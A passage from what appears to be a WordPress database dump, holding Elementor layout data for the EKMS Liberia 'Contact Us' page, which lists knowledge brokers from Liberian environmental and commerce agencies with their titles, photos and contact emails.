Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23033,3324,'_wp_attached_file','2021/01/so.jpg'),(23034,3324,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:14:\"2021/01/so.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"so-300x279.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"so-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23035,3325,'_elementor_edit_mode','builder'),(23036,3325,'_elementor_template_type','wp-page'),(23037,3325,'_elementor_version','3.0.16'),(23038,3325,'_wp_page_template','default'),(23039,3325,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a 